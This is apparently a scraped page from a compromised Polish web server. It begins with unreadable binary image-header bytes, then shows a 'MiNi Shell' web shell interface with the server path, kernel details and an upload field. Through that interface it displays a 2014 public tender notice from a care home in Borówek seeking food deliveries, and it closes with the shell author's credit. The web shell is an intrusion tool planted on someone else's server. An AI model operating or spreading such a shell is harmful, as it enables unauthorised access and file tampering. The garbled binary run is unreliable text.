JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140813/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140813/270098-N-2014.html

<p class="kh_header"><b>Bielawy: Dostawy artykułów spożywczych</b><br>
<b>Numer ogłoszenia: 270098 - 2014; data zamieszczenia: 13.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej "Borówek" im. Krystyny Bochenek , Borówek 56, 99-423 Bielawy, woj. łódzkie, tel. 46 8392114, faks 46 8392114.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna powiatu.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy artykułów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy artykułów spożywczych 
z możliwością podzielenia dostaw na części:
Różne produkty spożywcze
Przetworzone warzywa i przetworzone owoce 
Jajka
Warzywa 
Owoce
- wyszczególnione w odpowiednich formularzach cenowych - załączniki od nr 2 do nr 6 do Siwz. 
Cukier op. 1kg - kg	2700,
Mąka pszenna Szymanowska lub równoważna, typ 500 op. 1 kg - kg 1300,
Mąka ziemniaczana op.1kg - kg 30,
Sól warzona, jodowana, spożywcza op. 1kg - kg 400,
Kasza jęczmienna wiejska, średnia, op. 5 kg - kg 264,
Kasza gryczana op. 1 kg - kg	68,
Kasza manna op. 1 kg -	kg 146,
Ryż biały długoziarnisty, op. 1 kg - kg 369,
Pieprz ziołowy op. 30 g	- kg 0,5,
Pierz mielony czarny naturalny prawdziwy op. 30g - kg 7,
Pieprz czarny ziarnisty, cały op.16 g - kg 1,4,
Kwasek cytrynowy  op. 20 g - kg 1,
Liść laurowy op.7g - kg 0,5,
Majeranek otarty op.120 g - kg 4,
Przyprawa do potraw typu kucharek, op. 1 kg - kg 80,
Przyprawa do potraw typu magii op. 5 l - l 70,
Barszcz biały w płynie, op. 480 ml - l 60,
Rozpuszczalna kawa zbożowa op. 150 g -	kg 35,
Groch połówki op. 5 kg - kg 40,
Fasola Jaś średni op. 5 kg  - kg 200,
Ocet spirytusowy 10% op.1 l	- l 60,
Olej uniwersalny z pierwszego tłoczenia filtrowany na zimno 5 l.-l	410,
Musztarda sarepska op.1-10 kg -kg	150,
Syrop owocowy o smaku malinowym, op. 5 l - l	170,
Makaron kolanka, świderki, nitki op. 5 kg - kg 1100,
Wafelki kakaowe w czekoladzie op. 40 g	- kg 40,
Herbata granulowana indyjska op. 80 g - kg 150,
Płatki kukurydziane op. 2,5 kg	- kg 130,
Płatki owsiane op.400 g	- kg 190,
Płatki jęczmienne błyskawiczne op. 400 g	- kg	170.
Groszek konserwowy op. 400 g netto - kg	120,
Kukurydza konserwowa op. 340 g netto - kg 35,
Chrzan tarty op. 170 g.	 - kg 20,
Majonez op. 1-10 kg  - kg 130,
Ketchup mający w zawartości przynajmniej 160 g pomidora w 100 g ketchupu, łagodny i pikantny op. 1-10 kg - kg	150,
Ćwikła z chrzanem 350 g - kg 20,
Koncentrat pomidorowy 30% bez konserwantów op. 900 g - kg 240,
Budyń czekoladowy, waniliowy op. 40 g - kg 40,
Kisiel truskawkowy op. 38 g - kg 40,
Proszek do pieczenia op. 30 g - kg	3,
Herbatniki zwykłe typu petit-beaure op. 100 g -	kg 300,
Chrupki kukurydziane op. 80 g	 - kg	150,
Czekolada mleczna op. 100 g - kg 20,
Kakao ciemne op. 200 g netto	- kg 30,
Cukier waniliowy op. 16 g - kg 1,4,
Papryka mielona, smak ostry, kolor czerwony, konsystencja sypka op. 100-500 g -  		kg 1,
Rodzynki  op. 100 g - kg 7,
Konserwa turystyczna, stołowa, krakowska op. 400 g netto - kg	150,
Konserwa rybna - szprot w pomidorach, op. 170 g netto - kg 180,
Konserwa rybna w oleju- szprot op. 170 g netto - kg 60,
Paprykarz szczeciński op. 310 g netto - kg 50,
Konserwa - pasztet drobiowy op. 290 g netto - kg 70,
Koncentrat owocowy - aronia, naturalny nie słodzony, bez konserwantów, op. 100  - kg 70,
Sok w proszku - czarna porzeczka, naturalny, nie słodzony, bez konserwantów, op. 100 g - kg	35,
Mak suchy niebieski op.1 kg  - kg	10,
Mix aromatów do ciasta op. 50 fiolek x 4,5 g - l	1,50,
Ziele angielskie op. 15 g	 - kg	1,
Żelatyna spożywcza op. 45 g	- kg	3,
Cukier puder  op. 0,5 kg	 - kg	4,5,
Margaryna o   zmniejszonej zawartości tłuszczu 60 %  op. 250 g - kg 210,
Papryka konserwowa waga 660 g netto	 - kg	100,
Sałatka szwedzka waga 880 g netto - kg 200,
Sałatka łowicka lub równoważna, waga  450 g netto - kg	200,
Szczaw konserwowy waga 320 ml netto	 - kg 20,
Dżem z czarnej porzeczki, truskawkowy, wiśniowy, brzoskwiniowy, wieloowocowy niskosłodzony waga   1 kg netto - kg 610,
Powidła śliwkowe lub marmolada waga  110 g netto - kg	25,
Ogórek konserwowy waga 475 g netto	- kg	450,
Ogórek kiszony - beczka, waga  75 kg netto - kg 800,
Kapusta kiszona - beczka, waga 110 kg netto - kg	900,
Jajka 	- kg 1000, 
Ziemniaki, kształtne, sortowane - kg 11200,
Marchew - kg 1200,
Pietruszka	- kg 350,
Cebula - kg	750,
Seler - kg 350,
Por - kg 150,
Buraczki czerwone - kg	920,
Kapusta biała - kg 720,
Kapusta pekińska	- kg 100,
Kapusta brukselka	 - kg	50,
Pieczarki  - kg 300,
Sałata -kg	60,
Rzodkiewka	- kg 10,
Papryka - kg 60,
Kalafior - kg 150,
Koper	 - kg	10,
Czosnek - kg 8,
Ogórek zielony - kg 1200,
Fasola  - kg	150,
Pomidory - kg 800,
Jabłka - kg	4600,
Arbuzy sezonowo - kg	400,
Truskawki sezonowo - kg 100,
Rabarbar sezonowo - kg	70,
Wiśnie sezonowo - kg	100.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających o wartości +/- 20% zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.00.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 365.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Będzie pobierane oświadczenie od Wykonawcy o spełnieniu tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Będzie pobierane oświadczenie od Wykonawcy o spełnieniu tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Będzie pobierane oświadczenie od Wykonawcy o spełnieniu tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Będzie pobierane oświadczenie od Wykonawcy o spełnieniu tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Będzie pobierane oświadczenie od Wykonawcy o spełnieniu tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.lowicz.pl-Jednostki organizacyjne powiatu-Dom Pomocy Społecznej w Borówku-Przetergi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej Borówek, im.Krystyny Bochenek, Borówek 56, 99-423 Bielawy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.08.2014 godzina 10:00, miejsce: Sekretariat Domu Pomocy Społecznej Borówek, im.Krystyny Bochenek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com